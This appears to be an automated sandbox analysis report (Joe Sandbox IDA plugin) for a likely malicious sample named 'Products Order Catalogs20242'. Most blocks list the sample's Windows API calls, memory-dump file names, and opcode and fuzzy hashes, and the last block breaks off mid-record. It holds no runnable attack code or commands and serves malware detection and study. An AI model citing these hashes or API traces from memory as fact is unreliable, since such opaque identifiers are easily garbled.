                                                                                                • SendMessageW.USER32(019A1BB8,000000F1,00000000,00000000), ref: 004414C6
                                                                                                • SendMessageW.USER32(019A1BB8,000000F1,00000001,00000000), ref: 004414F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 312131281-0
                                                                                                • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 004484C4
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                • IsMenu.USER32(?), ref: 0044857B
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                • DrawMenuBar.USER32 ref: 004485E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 3866635326-4108050209
                                                                                                • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                • String ID: 0vH
                                                                                                • API String ID: 327565842-3662162768
                                                                                                • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                • GetFocus.USER32 ref: 00448B1C
                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3429747543-0
                                                                                                • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • _memset.LIBCMT ref: 00401C62
                                                                                                • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                • String ID: Line:
                                                                                                • API String ID: 1620655955-1585850449
                                                                                                • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                • String ID: %lu$HH
                                                                                                • API String ID: 3164766367-3924996404
                                                                                                • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Msctls_Progress32
                                                                                                • API String ID: 3850602802-3636473452
                                                                                                • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                APIs
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 3985565216-0
                                                                                                • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                • __calloc_crt.LIBCMT ref: 00415743
                                                                                                • __getptd.LIBCMT ref: 00415750
                                                                                                • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1269668773-0
                                                                                                • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                APIs
                                                                                                  • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                  • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 1957940570-0
                                                                                                • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 4166825349-0
                                                                                                • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                • API String ID: 2574300362-3261711971
                                                                                                • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3220332590-0
                                                                                                • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1612042205-0
                                                                                                • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                                                • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
